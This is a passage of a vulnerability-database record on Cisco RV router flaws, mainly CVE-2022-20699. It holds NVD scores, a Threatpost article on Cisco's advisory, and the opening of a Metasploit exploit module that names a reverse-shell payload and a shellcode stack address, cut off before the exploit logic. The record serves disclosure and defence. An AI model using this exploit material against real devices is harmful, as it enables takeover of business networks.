"AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv345p_firmware:1.0.03.24:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv340w_firmware:1.0.03.24:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv260_firmware:1.0.01.05:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv160w_firmware:1.0.01.05:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv260p_firmware:1.0.01.05:*:*:*:*:*:*:*", 
"cpe:2.3:o:cisco:rv160_firmware:1.0.01.05:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv345_firmware:1.0.03.24:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv340_firmware:1.0.03.24:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv260w_firmware:1.0.01.05:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:04:52", "description": "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-10T18:15:00", "type": "cve", "title": "CVE-2022-20701", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20701"], "modified": "2022-03-23T20:40:00", "cpe": ["cpe:/o:cisco:rv340_firmware:1.0.03.24", "cpe:/o:cisco:rv345_firmware:1.0.03.24", "cpe:/o:cisco:rv345p_firmware:1.0.03.24", "cpe:/o:cisco:rv340w_firmware:1.0.03.24"], "id": 
"CVE-2022-20701", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-20701", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv340_firmware:1.0.03.24:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv345p_firmware:1.0.03.24:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv340w_firmware:1.0.03.24:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv345_firmware:1.0.03.24:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:04:50", "description": "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-10T18:15:00", "type": "cve", "title": "CVE-2022-20700", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20700"], "modified": "2022-02-17T17:31:00", 
"cpe": ["cpe:/o:cisco:rv345_firmware:1.0.03.24", "cpe:/o:cisco:rv160w_firmware:1.0.01.05", "cpe:/o:cisco:rv160_firmware:1.0.01.05", "cpe:/o:cisco:rv260p_firmware:1.0.01.05", "cpe:/o:cisco:rv340_firmware:1.0.03.24", "cpe:/o:cisco:rv260w_firmware:1.0.01.05", "cpe:/o:cisco:rv340w_firmware:1.0.03.24", "cpe:/o:cisco:rv345p_firmware:1.0.03.24", "cpe:/o:cisco:rv260_firmware:1.0.01.05"], "id": "CVE-2022-20700", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-20700", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv345p_firmware:1.0.03.24:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv340w_firmware:1.0.03.24:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv260_firmware:1.0.01.05:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv160w_firmware:1.0.01.05:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv260p_firmware:1.0.01.05:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv160_firmware:1.0.01.05:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv345_firmware:1.0.03.24:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv340_firmware:1.0.03.24:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv260w_firmware:1.0.01.05:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:04:50", "description": "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": 
"2022-02-10T18:15:00", "type": "cve", "title": "CVE-2022-20699", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20699"], "modified": "2022-05-12T19:36:00", "cpe": ["cpe:/o:cisco:rv340_firmware:1.0.03.24", "cpe:/o:cisco:rv345_firmware:1.0.03.24", "cpe:/o:cisco:rv345p_firmware:1.0.03.24", "cpe:/o:cisco:rv340w_firmware:1.0.03.24"], "id": "CVE-2022-20699", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-20699", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:cisco:rv340_firmware:1.0.03.24:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv345p_firmware:1.0.03.24:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv340w_firmware:1.0.03.24:*:*:*:*:*:*:*", "cpe:2.3:o:cisco:rv345_firmware:1.0.03.24:*:*:*:*:*:*:*"]}], "threatpost": [{"lastseen": "2022-02-10T00:00:00", "description": "UPDATE\n\nCritical security vulnerabilities in Cisco\u2019s Small Business RV Series routers could allow privilege escalation, remote code execution (RCE) with root privileges on the devices and more.\n\nThe RV series is a set of affordable VPN appliances that enable remote workers to connect to a company network. They come with built-in firewalls, advanced encryption and authentication features.\n\nThe critical bugs are part of 15 total vulnerabilities affecting the RV product line that Cisco disclosed this week. 
Some of the issues are exploitable on their own, while others must be chained together, the networking giant said \u2013 but they all could lead to a concerning cornucopia of bad outcomes. Some of these remain unpatched at the time of writing.\n\nAccording to Cisco\u2019s [Wednesday advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D>), attackers could exploit the bugs (which variously affect the RV160, RV260, RV340 and RV345 appliances) to do the following:\n\n * Execute arbitrary code\n * Elevate privileges\n * Execute arbitrary commands\n * Bypass authentication and authorization protections\n * Fetch and run unsigned software\n * Cause denial of service (DoS)\n\nCisco also said that proof-of-concept exploits are available for \u201cseveral of the vulnerabilities,\u201d but the company didn\u2019t offer details on any in-the-wild attacks.\n\nSome of the flaws only affect the RV340/RV345 line of Dual WAN Gigabit VPN routers, noted where applicable below. These affect version 1.0.03.24 and earlier and are patched in version 1.0.03.26.\n\nFor the RV160 and RV260 series, Cisco noted that versions 1.0.01.05 and earlier are affected. January\u2019s release of firmware version 1.0.01.07 addressed some of the issues, as detailed in the release notes ([PDF](<https://www.cisco.com/c/dam/en/us/td/docs/routers/csbr/RV260/Release_notes/RV16x_Rv26x_relnote_v1_0_01_07.pdf>)), but full patches are still forthcoming, the vendor confirmed to Threatpost. And unfortunately, in the meantime, no workarounds are available.\n\n\u201cCisco is working on fixes for the identified vulnerabilities for the RV160 and RV260 series routers as quickly as possible,\u201d a spokesperson said. \u201cOf the vulnerabilities identified in the advisory, five have fixes available today in release version 1.0.01.07. 
The remaining fixes will be released as soon as possible in February.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/03142427/Cisco-RV-e1643916286436.png>)\n\nSource: Cisco security advisory.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/03143256/Cisco-RV2.png>)\n\nSource: Cisco Release Notes for RV160, firmware version 1.0.01.07.\n\n## **Critical Cisco Bugs in RV Routers**\n\n### **Remote Code Execution**\n\nThe most concerning critical vulnerability rates 10 out of 10 on the CVSS vulnerability-severity scale. It arises in the SSL VPN module of Cisco Small Business RV340, RV340W, RV345 and RV345P Dual WAN Gigabit VPN routers. It could allow unauthenticated RCE, according to the advisory. At worst, device takeover would allow unfettered access to the business network on the part of an attacker.\n\n\u201cThis vulnerability is due to insufficient boundary checks when processing specific HTTP requests,\u201d the advisory reads. \u201cAn attacker could exploit this vulnerability by sending malicious HTTP requests to the affected device that is acting as an SSL VPN Gateway. 
A successful exploit could allow the attacker to execute code with root privileges on the affected device.\u201d\n\nThis one\u2019s of note, researchers said, because it exists in a favorite cybercrime target.\n\n\u201cWith the increase in usage of SSL VPNs over the last three years since the beginning of the pandemic, SSL VPNs are a favored attack vector for cybercriminals, as they recognize that organizations need to ensure access to internal resources for remote employees,\u201d Satnam Narang, staff research engineer at Tenable, said via email.\n\n### **Privilege-Escalation Vulnerabilities**\n\nThe flaws tracked as CVE-2022-20700, CVE-2022-20701 and CVE-2022-20702 meanwhile exist in the web-based management interface of Cisco Small Business RV Series Routers and could allow a remote attacker to elevate privileges to root.\n\nCVE-2022-20700 and CVE-2022-20701 both rate critical, with CVSS scores of 10 and 9, respectively, while CVE-2022-20702 is rated medium-severity with a CVSS score of 6.\n\n\u201cThese vulnerabilities are due to insufficient authorization enforcement mechanisms,\u201d according to the advisory. \u201cAn attacker could exploit these vulnerabilities by submitting specific commands to an affected device. A successful exploit could allow the attacker to elevate privileges to root and execute arbitrary commands on the affected system.\u201d\n\n### **Running Unsigned Software**\n\nA critical bug tracked as CVE-2022-20703 (with a CVSS score of 9.3) is a vulnerability in the software image verification feature of the RV series that an unauthenticated, local adversary could exploit to install and boot a malicious software image or execute unsigned binaries.\n\n\u201cThis vulnerability is due to improper verification of software images as they are installed on an affected device. 
An attacker could exploit this vulnerability by loading unsigned software on the device,\u201d the advisory reads.\n\n### **Critical Command-Injection Bugs**\n\nThree bugs affecting the RV340, RV340W, RV345 and RV345P Dual WAN Gigabit VPN routers could allow an unauthenticated, remote attacker to inject and execute arbitrary commands on the underlying Linux operating system, Cisco warned.\n\nThe first, CVE-2022-20707, is critical and carries a CVSS rating of 10. CVE-2022-20708 and CVE-2022-20749 are both high-severity, with CVSS ratings of 7.3.\n\n\u201cThese vulnerabilities are due to insufficient validation of user-supplied input. An attacker could exploit these vulnerabilities by sending malicious input to an affected device,\u201d according to the advisory.\n\n## **Other Cisco Bugs in the RV Line**\n\nCisco also disclosed several high- and medium-severity vulnerabilities.\n\n### **High-Severity Command Injection**\n\nA vulnerability in the Open Plug and Play (PnP) module (CVE-2022-20706, CVSS score of 8.3) of the appliances could allow an unauthenticated, remote attacker to inject and execute arbitrary commands on the underlying Linux operating system, Cisco said.\n\n\u201cThis vulnerability is due to insufficient validation of user-supplied input,\u201d Cisco explained. 
\u201cAn attacker could exploit this vulnerability by sending malicious input to an affected device.\u201d\n\nOne caveat: A successful exploit requires the attacker to be in a man-in-the-middle (MitM) position or have control of a device connected to the vulnerable router.\n\n### **High-Severity Authentication-Bypass Bug**\n\nA high-severity vulnerability in the session management of the web interface for the RV appliances (CVE-2022-20705, CVSS score of 5.3) could be exploited by an unauthenticated, remote attacker to bypass authentication.\n\n\u201cA successful exploit could allow the attacker to take actions within the web UI with privileges up to the level of the administrative user and launch further attacks, exploiting the other vulnerabilities described in this advisory,\u201d according to Cisco. \u201cThe attacker could obtain partial administrative privileges and perform unauthorized actions.\u201d\n\nThe bug is due to \u201cweak entropy for session identifier generation functions,\u201d which a cyberattacker could exploit by brute-forcing a current session identifier, then reusing it to take over an ongoing session. Alternatively, an adversary could craft a new, valid session identifier and bypass the authentication mechanism entirely.\n\n### **High-Severity Arbitrary File Overwrite Bug**\n\nThe bug tracked as CVE-2022-20711 (with a CVSS score of 8.2) is found in the web interface of the RV340, RV340W, RV345 and RV345P Dual WAN Gigabit VPN routers. It could allow an unauthenticated, remote attacker to overwrite certain files on an affected device.\n\n\u201cThis vulnerability is due to insufficient input validation for specific components of the web UI,\u201d Cisco explained. \u201cAn attacker could exploit this vulnerability by sending crafted HTTP requests to an affected device. 
A successful exploit could allow the attacker to overwrite existing files or exfiltrate confidential data by tampering with the files that are served by the web UI process.\u201d\n\n### **High-Severity RCE**\n\nA vulnerability in the upload module of the RV devices (CVE-2022-20712) could allow RCE as a non-root user. It rates 7.3 on the CVSS scale.\n\n\u201cThis vulnerability is due to insufficient boundary checks when processing specific HTTP requests,\u201d according to Cisco. \u201cAn attacker could exploit this vulnerability by sending malicious HTTP requests to an affected device.\u201d\n\n### **Medium-Severity MitM Exploit for Server Communications**\n\nThe CVE-2022-20704 bug (medium-severity, with a CVSS score of 4.8) in the software-upgrade module of the RV series could allow an unauthenticated, remote attacker to view or alter information being shared between an affected device and specific Cisco servers (cloudsso.cisco.com and api.cisco.com).\n\nIt\u2019s due to improper validation of the SSL server certificate that is received when establishing the server connections, according to the advisory.\n\n\u201cAn attacker could exploit this vulnerability by using man-in-the-middle techniques to intercept the traffic between the affected device and the server, and then using a forged certificate to impersonate the server,\u201d Cisco explained. 
\u201cA successful exploit could allow the attacker to force the affected device to download arbitrary software images and launch further attacks, combining other vulnerabilities.\u201d\n\n### **Medium-Severity Arbitrary File Upload Vulnerability**\n\nA vulnerability in the web-based management interface of Cisco RV340, RV340W, RV345 and RV345P Dual WAN Gigabit VPN Routers (CVE-2022-20709, with a CVSS rating of 5.3) could allow an unauthenticated, remote attacker to upload arbitrary files to an affected device.\n\n\u201cThis vulnerability is due to insufficient authorization enforcement mechanisms in the context of file uploads,\u201d according to Cisco. \u201cAn attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device.\u201d\n\n### **Medium-Severity DoS Bug**\n\nA vulnerability in the internal interprocess communication of the RV line (CVE-2022-20710, with a CVSS score of 5.3) could allow DoS attacks from an unauthenticated, remote attacker.\n\nThe issue specifically affects the log-in functionality of the web-based management interface for the appliances, which \u201cerroneously handled exceptions during failed login attempts,\u201d according to Cisco.\n\n\u201cAn attacker could exploit this vulnerability by submitting a crafted HTTP packet to an affected device,\u201d the advisory reads. \u201cA successful exploit could allow the attacker to prevent users from logging in to the affected device. Successful exploitation of this vulnerability would not impact users who are already logged in.\u201d\n\n**This posting was updated on Feb. 4 at 1 p.m. 
ET to include a statement from Cisco confirming that some of the bugs are unpatched.**\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-03T20:15:54", "type": "threatpost", "title": "Critical Cisco Bugs Open VPN Routers to Cyberattacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-20700", "CVE-2022-20701", "CVE-2022-20702", "CVE-2022-20703", "CVE-2022-20704", "CVE-2022-20705", "CVE-2022-20706", "CVE-2022-20707", "CVE-2022-20708", "CVE-2022-20709", "CVE-2022-20710", "CVE-2022-20711", "CVE-2022-20712", "CVE-2022-20749"], "modified": "2022-02-03T20:15:54", "id": "THREATPOST:A07707C9B30B86A691C1A24C4DC65EE6", "href": "https://threatpost.com/critical-cisco-bugs-vpn-routers-cyberattacks/178199/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-11-05T17:56:44", "description": "# 
CVE-2022-20699 \ud83c\udfa7\n## Br...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-14T06:23:06", "type": "githubexploit", "title": "Exploit for Out-of-bounds Write in Cisco Rv340 Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20699"], "modified": "2022-11-05T15:57:52", "id": "26AFA65D-4E78-506D-A1E9-336FBDA926A1", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-17T20:32:04", "description": "# CVE-2022-20699 \ud83c\udfa7\n## Br...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-10T14:40:25", "type": "githubexploit", "title": "Exploit for Out-of-bounds Write in Cisco Rv340 Firmware", "bulletinFamily": 
"exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20699"], "modified": "2022-02-10T14:40:40", "id": "A97B12FD-207B-59C7-9E79-80106F63D735", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-03-14T15:32:36", "description": "# CVE-2022-20699 \ud83c\udfa7\n## Br...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-07T15:53:21", "type": "githubexploit", "title": "Exploit for Out-of-bounds Write in Cisco Rv340 Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20699"], "modified": "2023-03-14T15:09:16", "id": 
"2B4DA5E1-C2B9-5F0A-AFF5-D1C6D45FA38C", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "checkpoint_advisories": [{"lastseen": "2022-05-02T18:11:19", "description": "A denial of service vulnerability exists in Cisco Small Business RV Series Routers. Successful exploitation of this vulnerability would allow remote attackers to cause denial of service on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-02T00:00:00", "type": "checkpoint_advisories", "title": "Cisco Small Business RV Series Routers Denial Of Service (CVE-2022-20699)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20699"], "modified": "2022-05-02T00:00:00", "id": "CPAI-2022-0108", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2023-03-14T00:23:26", "description": "This Metasploit module exploits a stack buffer overflow in the Cisco RV series router's SSL VPN functionality. The default SSL VPN configuration is exploitable, with no authentication required and works over the Internet! 
The stack is executable and no ASLR is in place, which makes exploitation easier. Successful execution of this module results in a reverse root shell. A custom payload is used as Metasploit does not have ARMLE null free shellcode. This vulnerability was presented by the Flashback Team in Pwn2Own Austin 2021 and OffensiveCon 2022. For more information check the referenced advisory. This module has been tested in firmware versions 1.0.03.15 and above and works with around 65% reliability. The service restarts automatically so you can keep trying until you pwn it. Only the RV340 router was tested, but other RV series routers should work out of the box.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-12T00:00:00", "type": "zdt", "title": "Cisco RV340 SSL VPN Unauthenticated Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-20699"], "modified": "2022-05-12T00:00:00", "id": "1337DAY-ID-37729", "href": "https://0day.today/exploit/description/37729", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: 
https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::HttpClient\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Cisco RV340 SSL VPN Unauthenticated Remote Code Execution',\n 'Description' => %q{\n This module exploits a stack buffer overflow in the Cisco RV series routers SSL VPN\n functionality. The default SSL VPN configuration is exploitable, with no authentication\n required and works over the Internet!\n The stack is executable and no ASLR is in place, which makes exploitation easier.\n Successful execution of this module results in a reverse root shell. A custom payload is\n used as Metasploit does not have ARMLE null free shellcode.\n This vulnerability was presented by the Flashback Team in Pwn2Own Austin 2021 and OffensiveCon\n 2022. For more information check the referenced advisory.\n This module has been tested in firmware versions 1.0.03.15 and above and works with around\n 65% reliability. 
The service restarts automatically so you can keep trying until you pwn it.\n Only the RV340 router was tested, but other RV series routers should work out of the box.\n },\n 'Author' => [\n 'Pedro Ribeiro <[email\u00a0protected]>', # Vulnerability discovery and Metasploit module\n 'Radek Domanski <radek.domanski[at]gmail.com>' # Vulnerability discovery and Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'linux',\n 'References' => [\n ['CVE', '2022-20699'],\n ['URL', 'https://www.youtube.com/watch?v=O1uK_b1Tmts'],\n ['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Austin_2021/flashback_connects/flashback_connects.md'],\n ['URL', 'https://github.com/rdomanski/Exploits_and_Advisories/blob/master/advisories/Pwn2Own/Austin2021/flashback_connects/flashback_connects.md'],\n ['URL', 'https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-smb-mult-vuln-KA9PK6D.html'],\n ],\n 'Arch' => ARCH_ARMLE,\n # We actually use our own shellcode because Metasploit doesn't have ARM encoders!\n 'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/shell_reverse_tcp' },\n 'Targets' => [\n [\n 'Cisco RV340 Firmware Version <= 1.0.03.24',\n {\n # Shellcode location on stack (rwx stack, seriously Cisco...)\n # The same for all vulnerable firmware versions: 0x704aed98 (+ 1 for thumb)\n #\n # NOTE: this is the shellcode location about 65% of the time. The rest is 